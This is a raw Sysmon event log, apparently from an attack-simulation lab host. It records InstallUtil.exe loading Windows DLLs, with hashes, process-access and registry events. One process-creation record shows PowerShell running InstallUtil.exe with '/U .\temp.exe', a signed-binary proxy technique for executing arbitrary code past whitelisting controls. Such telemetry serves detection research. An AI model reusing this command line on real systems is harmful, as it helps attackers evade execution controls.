16:44:56.299{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=F058FE3C5E3DEF875A654A18551D88E5,SHA256=78DC0394AA359DBD2EB8BE7F13FEDF0478C8AA55785712B358FAC1C97D051B87trueMicrosoft WindowsValid 734700x800000000000000057557114Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:44:56.299{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\combase.dll10.0.14393.4583 (rs1_release.210730-1850)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=6FDB4F1612AC70891B9F6E6005AA5DDB,SHA256=6DFEC2EE6E2A7CB4409AB824737A3657E6D66E309AFE83C28E0CE0676687F737trueMicrosoft WindowsValid 734700x800000000000000057557099Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:44:56.314{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\psapi.dll10.0.14393.0 (rs1_release.160715-1616)Process Status HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationPSAPIMD5=7B73FC5AD82AF0FB84212106455E0D48,SHA256=CF6A2C746B3A9B9294A41DE686ED35FC99BB6A8ABEA7DC6A81D15C67613B98D6trueMicrosoft WindowsValid 734700x800000000000000057557098Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:44:56.314{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\ucrtbase_clr0400.dll14.10.25028.0 built by: VCTOOLSD15RTMMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationucrtbase_clr0400.dllMD5=BFE20E1D9BEBE61CD8898663FDACB74E,SHA256=AA416A9E707BE8475051FF502D20077A687D14CF3ABABF4959F489A3B5BFBF8BtrueMicrosoft CorporationValid 734700x800000000000000057557097Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:44:56.314{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\vcruntime140_clr0400.dll14.10.25028.0 built by: VCTOOLSD15RTMMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140_clr0400.dllMD5=071309BE821483287A0FE982AEF005C1,SHA256=932920FE06897C0B2ADAF7FA855E3B45498D213994E81AB8694D9EE5CA53AC0AtrueMicrosoft CorporationValid 13241300x800000000000000057557096Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 16:44:56.314{8B6011A9-884A-6164-0100-00000000F101}4SystemHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\CIT\Module\Microsoft.NET/Framework/v4.0.30319/clr.dll\\Device\HarddiskVolume1\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQWORD (0x01d7d7e4-0x9fbc370c) 734700x800000000000000057557094Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:44:56.314{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll4.8.4410.0 built by: NET48REL1LAST_BMicrosoft .NET Runtime Common Language Runtime - WorkStationMicrosoft® .NET FrameworkMicrosoft Corporationclr.dllMD5=9C0F4F0DC954D96E7D70E5FBD85D7EE6,SHA256=A4C9BBF0836A49DADBDD87ED8372D290CCC0A0177B0D4B484AD18DC9C7BCC073trueMicrosoft CorporationValid 734700x800000000000000057557093Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:44:56.299{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\version.dll10.0.14393.0 (rs1_release.160715-1616)Version Checking and File Installation LibrariesMicrosoft® Windows® Operating SystemMicrosoft CorporationVERSION.DLLMD5=181FE38C3FE164FBFC1A5A8399CCC2DA,SHA256=233C31D9FC1C50A3E0688C1E778D356B419ED4A70D7B6870CA7631E4FE5C2AF9trueMicrosoft WindowsValid 734700x800000000000000057557091Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:44:56.299{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=4BA1C50E6607AE70495B58874963B901,SHA256=72BBBB4145E058C3B12504AC0EC128CD44E282D40959D018192899276A2B9C69trueMicrosoft WindowsValid 734700x800000000000000057557090Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:44:56.299{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=203F58BA41B48A59D6A047E0233DB422,SHA256=4204F7C2B4E13AA3819A180FACA724435F6400FE97D2EF6C74634A0D7E51F7F3trueMicrosoft WindowsValid 734700x800000000000000057557089Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:44:56.299{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\shlwapi.dll10.0.14393.4169 (rs1_release.210107-1130)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=0FDEB9236FF287E329F2EF155BA8AE56,SHA256=5F0C2A29312C82D14B8B42D2B6AAFEB82EBAD20822B603FD162E6AAF39B06C95trueMicrosoft WindowsValid 734700x800000000000000057557088Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:44:56.299{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll4.8.4180.0 built by: NET48REL1LAST_BMicrosoft .NET Runtime Execution EngineMicrosoft® .NET FrameworkMicrosoft Corporationmscoreei.dllMD5=606B77C072A964DA4E4710151CAC86EB,SHA256=C6C9E8D77B62C7A52E6E9EAC764C1E1345779FC17544B80730E507627A5D5120trueMicrosoft CorporationValid 734700x800000000000000057557087Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:44:56.299{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\bcryptprimitives.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=D1F45F71014220112988A7BF64EE83EE,SHA256=60E8C6D420FC4AFF309FE9CB53327D8DC4EC541F627E4461C465561512D1ED5DtrueMicrosoft WindowsValid 734700x800000000000000057557086Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:44:56.299{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=3D4308BAC53B881B16D9BD1006ABDC65,SHA256=26DF85FC22F9FCAA2212CB66612FE8F5CC6382953FE81B9C34128E43080C7891trueMicrosoft WindowsValid 734700x800000000000000057557085Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:44:56.299{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\sspicli.dll10.0.14393.2580 (rs1_release_inmarket.181009-1745)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecurity.dllMD5=580643DD40890B231399EA5F57EFAA70,SHA256=0B374B1825ABFF7B26170E75F1B638DF08A15B07660A7DF5533F02853CF266C6trueMicrosoft WindowsValid 734700x800000000000000057557084Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:44:56.299{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\rpcrt4.dll10.0.14393.4467 (rs1_release.210604-1844)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=990CA13B9FE19A5A611F77B333BC9AAD,SHA256=EC3960CAABA4FC0287601311BDCC14D472A165DA7C43F88665D984CE1A0B7DE4trueMicrosoft WindowsValid 734700x800000000000000057557081Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:44:56.299{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\sechost.dll10.0.14393.3808 (rs1_release.200707-2105)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=3394E4EEB4851D80DD7548EC87EAEA5F,SHA256=7F670ACCE58EAADE796FEF335B4EAEAB66DFC47875219B9BE3C9B405A452450BtrueMicrosoft WindowsValid 734700x800000000000000057557070Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:44:56.299{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=F3B7F231407DD207CABC94C9347984AC,SHA256=053A1D95EEB426416278D2AD7D584FDD984A8B445CC88B46785AB8666383FB0BtrueMicrosoft WindowsValid 734700x800000000000000057557063Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:44:56.283{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe4.8.3761.0 built by: NET48REL1.NET Framework installation utilityMicrosoft® .NET FrameworkMicrosoft CorporationInstallUtil.exeMD5=AF862061889F5B9B956E9469DCDAE773,SHA256=AF5CBD35C7D8DEA7D879113FDA61B0F64AC6618BCDAE15C0C732A018BABF68EEtrueMicrosoft CorporationValid 734700x800000000000000057557059Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:44:56.299{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\advapi32.dll10.0.14393.4467 (rs1_release.210604-1844)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=A1EDD29F959E38F8AE4AF9B5CDD2B534,SHA256=CE5ECDC3BEFA2DC8C826A697EAC6CDAC12753258315701130CDEDB19D24DBC75trueMicrosoft WindowsValid 10341000x800000000000000057557056Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:44:56.299{8B6011A9-EC34-6172-7AB6-01000000F101}931610168C:\Windows\system32\conhost.exe{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000057557055Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:44:56.299{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=E3B7B5531159A395AC63B7EA256FE7B6,SHA256=B631E93E271E706E0204B606D7851ADF7E65FCA04ACDD73103F0754A9C01007EtrueMicrosoft WindowsValid 734700x800000000000000057557054Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:44:56.299{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=E0C87CF8838DB8C6DBD24A708FCED51B,SHA256=0616E630C7F8E116CE43390638C9CE99209556662C2BBDF5845F1CD03E1C6C4EtrueMicrosoft WindowsValid 734700x800000000000000057557053Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:44:56.299{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\mscoree.dll10.0.14393.0 (rs1_release.160715-1616)Microsoft .NET Runtime Execution EngineMicrosoft® Windows® Operating SystemMicrosoft Corporationmscoree.dllMD5=2582AA6C1F88D34B37B7F82D790D232E,SHA256=AA948BB6583057E2E2F299EBD1717A42D6559CA27AF6BC756D3C3BB4109E4E77trueMicrosoft WindowsValid 734700x800000000000000057557052Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:44:56.283{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\System32\wow64cpu.dll10.0.14393.3503 (rs1_release.200131-0410)AMD64 Wow64 CPU Microsoft® Windows® Operating SystemMicrosoft Corporationwow64cpu.dllMD5=C1F2078639481364EA3FDD10CBEB1A18,SHA256=B63E6DC0B3D7ABA9CB95929A1A360208A570CB2072474276F649B68F1AC8DC82trueMicrosoft WindowsValid 734700x800000000000000057557051Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:44:56.283{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValid 734700x800000000000000057557050Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:44:56.283{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 734700x800000000000000057557049Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:44:56.283{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=E0C87CF8838DB8C6DBD24A708FCED51B,SHA256=0616E630C7F8E116CE43390638C9CE99209556662C2BBDF5845F1CD03E1C6C4EtrueMicrosoft WindowsValid 734700x800000000000000057557048Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:44:56.283{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 734700x800000000000000057557047Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:44:56.283{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\System32\wow64win.dll10.0.14393.3383 (rs1_release.191125-1816)Wow64 Console and Win32 API LoggingMicrosoft® Windows® Operating SystemMicrosoft Corporationwow64lg2.dllMD5=62DEBA17D0A26B352F1C3F02144BC6EA,SHA256=5A1C08FE318942CB31048DBD641E25610DE842E34470B3E54FEDCA4E2642D4E0trueMicrosoft WindowsValid 734700x800000000000000057557046Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:44:56.283{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\System32\wow64.dll10.0.14393.3503 (rs1_release.200131-0410)Win32 Emulation on NT64Microsoft® Windows® Operating SystemMicrosoft Corporationwow64.dllMD5=447615F19DAAFF9C308370C59F493BF8,SHA256=45ED2009CEEB249BBF518B958AF02B97E667DB68C9B6D65642E69E9B0300CF5DtrueMicrosoft WindowsValid 734700x800000000000000057557045Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:44:56.283{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\ntdll.dll10.0.14393.4530 (rs1_release.210705-0736)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=4EA36017E45CC2C5D3D2EABEFBE25941,SHA256=6E96551961497DBE66E0329711E4AC670713DF9315B948D7CB5EEAE8C757292FtrueMicrosoft WindowsValid 734700x800000000000000057557043Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:44:56.283{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\System32\ntdll.dll10.0.14393.4530 (rs1_release.210705-0736)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=36B87C41EE39F3051D116F735EBEF866,SHA256=9C45BAE6D7E27B3AE04BBF88B96686C04ED6A43695558E82B687013BA0383F8AtrueMicrosoft WindowsValid 10341000x800000000000000057557042Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:44:56.283{8B6011A9-888A-6164-7000-00000000F101}34483736C:\Windows\system32\csrss.exe{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000057557041Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:44:56.283{8B6011A9-EC34-6172-79B6-01000000F101}86407060C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+50f0099(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+45734f2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+457312d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+503b45b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+453009f(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4593b11(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4575b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4575b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+45759b1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+45666d1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4573c13(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4573785(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+45734f2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+457312d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+503b45b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+45583d8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+455794a(wow64) 154100x800000000000000057557040Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:44:56.263{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe4.8.3761.0 built by: NET48REL1.NET Framework installation utilityMicrosoft® .NET FrameworkMicrosoft CorporationInstallUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" /logfile= /LogToConsole=false /U .\temp.exeC:\Users\Administrator\Desktop\ATTACKRANGE\Administrator{8B6011A9-8897-6164-CBF3-050000000000}0x5f3cb2HighMD5=AF862061889F5B9B956E9469DCDAE773,SHA256=AF5CBD35C7D8DEA7D879113FDA61B0F64AC6618BCDAE15C0C732A018BABF68EE{8B6011A9-EC34-6172-79B6-01000000F101}8640C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 734700x800000000000000057558485Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:44:57.353{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\rasadhlp.dll10.0.14393.0 (rs1_release.160715-1616)Remote Access AutoDial HelperMicrosoft® Windows® Operating SystemMicrosoft Corporationrasadhlp.dllMD5=49F66601F196554BC9B36310CE84F011,SHA256=44FD17A3EC95EC7D0F568E132A6793BEB7582A8B48E7EEEC6C958BD217CFCA6AtrueMicrosoft WindowsValid 734700x800000000000000057558458Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:44:57.338{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\FWPUCLNT.DLL10.0.14393.0 (rs1_release.160715-1616)FWP/IPsec User-Mode APIMicrosoft® Windows® Operating SystemMicrosoft Corporationfwpuclnt.dllMD5=BA22C7AFE02E09916C5664E1DD98A879,SHA256=459AAE00EF66DADD15FB86684FFA028F0589C470A10EB27E0EA59C9E33C17E94trueMicrosoft WindowsValid 734700x800000000000000057558431Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:44:57.338{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\nlaapi.dll10.0.14393.3808 (rs1_release.200707-2105)Network Location Awareness 2Microsoft® Windows® Operating SystemMicrosoft Corporationnlaapi.dllMD5=BB8B552800A932011D1DFFAD4A85F1CB,SHA256=276EA7E8C366ECC78481112F5165977B9D5177DE5037186505DF110F325922E6trueMicrosoft WindowsValid 734700x800000000000000057558403Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:44:57.338{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\winrnr.dll10.0.14393.0 (rs1_release.160715-1616)LDAP RnR Provider DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationwinrnrMD5=6B408458867BF3B61F363C0EB423F87F,SHA256=275D8B0F1F7F3BAC6A08E911C7B60C5B732D841398D17C1DAB589C04E4750A9FtrueMicrosoft WindowsValid 734700x800000000000000057558376Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:44:57.338{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\NapiNSP.dll10.0.14393.0 (rs1_release.160715-1616)E-mail Naming Shim ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationnapinsp.dllMD5=390E89B590BF63EEBF88ABC15078A198,SHA256=936F066AA593F7F1487B6F98DDD2D887AAE0F02D19783D06B81F80DB58282C7BtrueMicrosoft WindowsValid 734700x800000000000000057558349Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:44:57.306{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\ncryptsslp.dll10.0.14393.4583 (rs1_release.210730-1850)Microsoft SChannel ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationncryptsslp.dllMD5=0B5DF00F4D46DB0FFA434546CEE426F9,SHA256=C88B30B1E4A5D446938125279E57DE9466EDAF84CDEAE2528E643482A78C658CtrueMicrosoft WindowsValid 734700x800000000000000057558324Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 16:44:57.291{8B6011A9-9A08-618E-3FFB-04000000F101}5540C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\gpapi.dll10.0.14393.4467 (rs1_release.210604-1844)Group Policy Client APIMicrosoft® Windows® Operating SystemMicrosoft Corporationgpapi.dllMD5=D409AA38187C3797062F0302323E45DC,SHA256=857F3A97586B70BF65E2619FA283199D7F915E257C9117D93B513E3599E74102trueMicrosoft 